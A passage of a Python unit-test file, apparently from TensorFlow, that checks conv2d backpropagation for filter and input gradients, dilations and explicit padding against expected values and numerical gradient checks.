with test_util.device(use_gpu):
t0 = constant_op.constant(x0, shape=input_sizes, dtype=dtype)
t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
t2 = constant_op.constant(x2, shape=output_sizes, dtype=dtype)
if data_format == "NCHW":
t0 = test_util.NHWCToNCHW(t0)
t2 = test_util.NHWCToNCHW(t2)
conv = nn_ops.conv2d_backprop_filter(
t0,
t1,
t2,
strides=explicit_strides,
padding=new_padding,
dilations=new_dilations,
data_format=data_format)
value = self.evaluate(conv)
self.assertShapeEqual(value, conv)
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(expected, value.flatten(), err)
def _CompareBackFilter(self, input_sizes, filter_sizes, output_sizes,
conv_strides, padding):
x0 = np.random.rand(*input_sizes).astype(np.float32)
x2 = np.random.rand(*output_sizes).astype(np.float32)
def _GetVal(data_format, use_gpu):
with test_util.device(use_gpu):
t0 = constant_op.constant(x0, shape=input_sizes)
t1 = constant_op.constant(filter_sizes, shape=[len(filter_sizes)])
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + conv_strides + [1]
if data_format == "NCHW":
t0 = test_util.NHWCToNCHW(t0)
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
conv = nn_ops.conv2d_backprop_filter(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format)
ret = self.evaluate(conv)
self.assertShapeEqual(ret, conv)
return ret
values = []
for (data_format, use_gpu) in GetTestConfigs():
values.append(_GetVal(data_format, use_gpu))
for i in range(1, len(values)):
self.assertAllClose(values[0], values[i], rtol=1e-4, atol=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropFilter(self):
expected = [5.0, 8.0, 14.0, 17.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropFilter(self):
expected = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DBackpropFilterWithEmptyInput(self):
expected = [0, 0, 0, 0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilter(self):
expected = [
17.0, 22.0, 27.0, 22.0, 29.0, 36.0, 27.0, 36.0, 45.0, 32.0, 43.0, 54.0,
37.0, 50.0, 63.0, 42.0, 57.0, 72.0, 62.0, 85.0, 108.0, 67.0, 92.0,
117.0, 72.0, 99.0, 126.0, 77.0, 106.0, 135.0, 82.0, 113.0, 144.0, 87.0,
120.0, 153.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropFilterStride1x2(self):
expected = [161.0, 182.0, 287.0, 308.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropFilter(self):
expected_output = [78.]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropFilter(self):
expected_output = [1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 4.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilter(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu)
# Testing for backprops
def _RunAndVerifyBackpropInputDilation(self, input_sizes, filter_sizes,
output_sizes, strides, dilations,
padding, data_format, use_gpu, err):
x1 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(filter_sizes)
default_dilations = (dilations[0] == 1 and dilations[1] == 1)
if default_dilations or use_gpu:
with self.cached_session(use_gpu=use_gpu) as sess:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t1 = constant_op.constant(x1, shape=input_sizes)
t2 = constant_op.constant(x2, shape=filter_sizes)
full_strides = [1] + strides + [1]
full_dilations = [1] + dilations + [1]
if data_format == "NCHW":
full_strides = test_util.NHWCToNCHW(full_strides)
full_dilations = test_util.NHWCToNCHW(full_dilations)
conv_forward = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilations,
padding=padding,
data_format=data_format)
conv_forward_2 = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilations,
data_format=data_format)
if data_format == "NCHW":
conv_forward = test_util.NCHWToNHWC(conv_forward)
conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
conv = gradients_impl.gradients(conv_forward, t1)[0]
conv_2 = gradients_impl.gradients(conv_forward_2, t1)[0]
# "values" consists of two tensors for two backprops
value = self.evaluate(conv)
value_2 = self.evaluate(conv_2)
self.assertShapeEqual(value, conv)
self.assertShapeEqual(value_2, conv_2)
tf_logging.debug("expected = %s", value_2)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(value_2.flatten(), value.flatten(), err)
# Testing for backprops
def _RunAndVerifyBackpropFilterDilation(self, input_sizes, filter_sizes,
output_sizes, strides, dilations,
padding, data_format, use_gpu, err):
x1 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(filter_sizes)
default_dilations = (dilations[0] == 1 and dilations[1] == 1)
if default_dilations or use_gpu:
with self.cached_session(use_gpu=use_gpu) as sess:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t1 = constant_op.constant(x1, shape=input_sizes)
t2 = constant_op.constant(x2, shape=filter_sizes)
full_strides = [1] + strides + [1]
full_dilations = [1] + dilations + [1]
if data_format == "NCHW":
full_strides = test_util.NHWCToNCHW(full_strides)
full_dilations = test_util.NHWCToNCHW(full_dilations)
conv_forward = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilations,
padding=padding,
data_format=data_format)
conv_forward_2 = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilations,
data_format=data_format)
if data_format == "NCHW":
conv_forward = test_util.NCHWToNHWC(conv_forward)
conv_forward_2 = test_util.NCHWToNHWC(conv_forward_2)
conv = gradients_impl.gradients(conv_forward, t2)[0]
conv_2 = gradients_impl.gradients(conv_forward, t2)[0]
value = self.evaluate(conv)
value_2 = self.evaluate(conv_2)
self.assertShapeEqual(value, conv)
self.assertShapeEqual(value_2, conv_2)
tf_logging.debug("expected = %s", value_2)
tf_logging.debug("actual = %s", value)
self.assertArrayNear(value_2.flatten(), value.flatten(), err)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropFilterDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 0],
output_sizes=[1, 1, 2, 0],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 4, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropFilterDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputStride1x1Dilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 5, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth1ValidBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2DEmptyBackpropInputDilation1x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
dilations=[1, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.deprecated_graph_mode_only
def testConv2D2x2Depth3ValidBackpropInputDilation2x1(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
# The GPU version of this test is not very stable. So adjusting the
# error threshold to 1e-4.
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 2, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.deprecated_graph_mode_only
def testConv2DKernelSizeMatchesInputSizeBackpropInputDilation2x2(self):
if test.is_gpu_available(cuda_only=True) or test_util.IsMklEnabled():
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputDilation(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID",
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
def _RunAndVerifyBackpropInputExplicitPadding(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
data_format,
use_gpu,
dilations=(1, 1),
err=2e-5):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
if not use_gpu and dilations != (1, 1):
return # Non-default dilations is currently not supported on the CPU.
x1 = self._CreateNumpyTensor(filter_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
padded_input_sizes = input_sizes[:]
padded_input_sizes[1] += padding[0][0] + padding[0][1]
padded_input_sizes[2] += padding[1][0] + padding[1][1]
c = nn_ops.conv2d_backprop_input(
padded_input_sizes,
x1,
x2,
strides=[1] + strides + [1],
padding="VALID",
dilations=[1] + dilations + [1])
c = c[:, padding[0][0]:(c.shape[1] - padding[0][1]), padding[1][0]:(
c.shape[2] - padding[1][1]), :]
expected = list(self.evaluate(array_ops.reshape(c, [-1])))
self._RunAndVerifyBackpropInput(
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu=use_gpu,
err=err,
dilations=dilations)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding1x1BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 3, 4, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 2],
filter_sizes=[1, 1, 2, 1],
output_sizes=[1, 4, 3, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 4, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 4, 2, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
dilations=[2, 2], use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding2x2BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[2, 3, 1, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[2, 2, 5, 1],
strides=[3, 1],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 6, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 3, 4, 1],
strides=[1, 2],
padding=[[2, 2], [2, 2]],
data_format=data_format,
dilations=[2, 3],
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_1_8_4_1_BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 10, 8, 1],
strides=[1, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=5e-5)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 5, 3, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 4, 8, 1],
strides=[3, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_5_0_2_2_BackpropInput(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[1, 7, 7, 1],
strides=[1, 1],
padding=[[5, 0], [2, 2]],
data_format=data_format,
err=5e-5,
use_gpu=use_gpu)
self._RunAndVerifyBackpropInputExplicitPadding(
input_sizes=[1, 4, 2, 1],
filter_sizes=[3, 3, 1, 1],
output_sizes=[1, 5, 2, 1],
strides=[1, 2],
padding=[[5, 0], [2, 2]],
data_format=data_format,
dilations=[2, 1],
use_gpu=use_gpu)
def _RunAndVerifyBackpropFilterExplicitPadding(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
data_format,
use_gpu,
dilations=(1, 1),
err=1e-5):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
if not use_gpu and dilations != (1, 1):
return # Non-default dilations is currently not supported on the CPU.
x0 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
x0 = np.pad(x0, [(0, 0)] + padding + [(0, 0)], "constant")
c = nn_ops.conv2d_backprop_filter(
x0,
filter_sizes,
x2,
strides=[1] + strides + [1],
padding="VALID",
dilations=[1] + dilations + [1])
expected = list(self.evaluate(array_ops.reshape(c, [-1])))
self._RunAndVerifyBackpropFilter(
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu=use_gpu,
dilations=dilations,
err=err)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding0x0BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding=[[0, 0], [0, 0]],
data_format=data_format, use_gpu=use_gpu)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 4, 2],
filter_sizes=[2, 2, 2, 3],
output_sizes=[1, 1, 2, 3],
strides=[2, 2],
padding=[[0, 0], [0, 0]],
data_format=data_format, use_gpu=use_gpu)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding1x1BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 3, 4, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
err=5e-5)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 2],
filter_sizes=[1, 1, 2, 1],
output_sizes=[1, 4, 3, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
use_gpu=use_gpu,
data_format=data_format)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 4, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 4, 2, 1],
strides=[1, 2],
padding=[[1, 1], [1, 1]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 2])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding2x2BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[2, 3, 1, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[2, 2, 5, 1],
strides=[3, 1],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 6, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 3, 4, 1],
strides=[1, 2],
padding=[[2, 2], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 3])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_1_8_4_1_BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 10, 8, 1],
strides=[1, 1],
padding=[[1, 8], [4, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 5, 3, 1],
filter_sizes=[3, 2, 1, 1],
output_sizes=[1, 4, 8, 1],
strides=[3, 1],
padding=[[1, 8], [4, 2]],
use_gpu=use_gpu,
data_format=data_format)
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Depth1Padding_5_0_2_2_BackpropFilter(self):
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 3, 3, 1],
filter_sizes=[2, 1, 1, 1],
output_sizes=[1, 7, 7, 1],
strides=[1, 1],
padding=[[5, 0], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
self._RunAndVerifyBackpropFilterExplicitPadding(
input_sizes=[1, 4, 2, 1],
filter_sizes=[3, 3, 1, 1],
output_sizes=[1, 5, 2, 1],
strides=[1, 2],
padding=[[5, 0], [2, 2]],
data_format=data_format,
use_gpu=use_gpu,
dilations=[2, 1])
# Gradient checkers
def ConstructAndTestGradient(self,
batch,
input_rows,
input_cols,
filter_rows,
filter_cols,
in_depth,
out_depth,
stride_rows,
stride_cols,
padding,
test_input,
data_format,
use_gpu,
num_groups=1,
max_err=0.003):
assert in_depth % num_groups == 0 and out_depth % num_groups == 0
input_shape = [batch, input_rows, input_cols, in_depth]
filter_shape = [filter_rows, filter_cols, in_depth // num_groups, out_depth]
# TODO(yangke): re-factor the computation of output shape.
if padding == "VALID":
output_rows = (input_rows - filter_rows + stride_rows) // stride_rows
output_cols = (input_cols - filter_cols + stride_cols) // stride_cols
elif padding == "SAME":
output_rows = (input_rows + stride_rows - 1) // stride_rows
output_cols = (input_cols + stride_cols - 1) // stride_cols
else:
self.assertIsInstance(padding, (list, tuple))
output_rows = (input_rows + padding[1][0] + padding[1][1] - filter_rows +
stride_rows) // stride_rows
output_cols = (input_cols + padding[2][0] + padding[2][1] - filter_cols +
stride_cols) // stride_cols
output_shape = [batch, output_rows, output_cols, out_depth]
input_size = 1
for x in input_shape:
input_size *= x
filter_size = 1
for x in filter_shape:
filter_size *= x
input_data = [x * 1.0 / input_size for x in range(0, input_size)]
filter_data = [x * 1.0 / filter_size for x in range(0, filter_size)]
# Conv2DGrad functions are not compiled for double due to
# a problem in the way Eigen's Conv2DGrad works for double.
# So we disable the DOUBLE path. We should re-enable this
# when double support returns for CPU and/or GPU.
for dtype in self._DtypesToTest(use_gpu=use_gpu):
with self.cached_session(use_gpu=use_gpu):
input_tensor = constant_op.constant(
input_data, shape=input_shape, dtype=dtype, name="input")
filter_tensor = constant_op.constant(
filter_data, shape=filter_shape, dtype=dtype, name="filter")
strides = [1, stride_rows, stride_cols, 1]
new_padding = padding
if data_format == "NCHW":
new_input_tensor = test_util.NHWCToNCHW(input_tensor)
strides = test_util.NHWCToNCHW(strides)
if isinstance(padding, (list, tuple)):
new_padding = test_util.NHWCToNCHW(padding)
else:
new_input_tensor = input_tensor
conv = nn_ops.conv2d(
new_input_tensor,
filter_tensor,
strides,
new_padding,
data_format=data_format,
name="conv")
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
self.assertEqual(output_shape, conv.get_shape())
if test_input:
jacob_t, jacob_n = gradient_checker.compute_gradient(input_tensor,
input_shape,
conv,
output_shape)
else:
jacob_t, jacob_n = gradient_checker.compute_gradient(filter_tensor,
filter_shape,
conv,
output_shape)
if dtype == dtypes.float32:
reference_jacob_t = jacob_t
err = np.fabs(jacob_t - jacob_n).max()
else:
# Compare fp16 theoretical gradients to fp32 theoretical gradients,
# since fp16 numerical gradients are too imprecise.
err = np.fabs(jacob_t - reference_jacob_t).max()
tf_logging.debug("conv_2d gradient error = %s", err)
self.assertLess(err, max_err)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=4,
input_cols=5,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientValidPaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=4,
out_depth=5,
stride_rows=3,
stride_cols=3,
padding="VALID",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientValidPaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=3,
stride_cols=3,
padding="VALID",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideOne(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=1,
stride_cols=1,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
in_depth=3,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideTwo(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=4,
input_rows=6,
input_cols=5,
filter_rows=2,
filter_cols=2,
in_depth=2,
out_depth=3,
stride_rows=2,
stride_cols=2,
padding="SAME",
test_input=False,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testInputGradientSamePaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=7,
input_cols=6,
filter_rows=3,
filter_cols=3,
in_depth=4,
out_depth=5,
stride_rows=3,
stride_cols=3,
padding="SAME",
test_input=True,
data_format=data_format,
use_gpu=use_gpu)
@test_util.deprecated_graph_mode_only
def testFilterGradientSamePaddingStrideThree(self):
for (data_format, use_gpu) in GetTestConfigs():
self.ConstructAndTestGradient(
batch=2,
input_rows=8,
input_cols=7,
filter_rows=4,
filter_cols=4,
in_depth=2,
out_depth=3,
stride_rows=3,
stride_cols=3,
padding="SAME",
test_input=False,
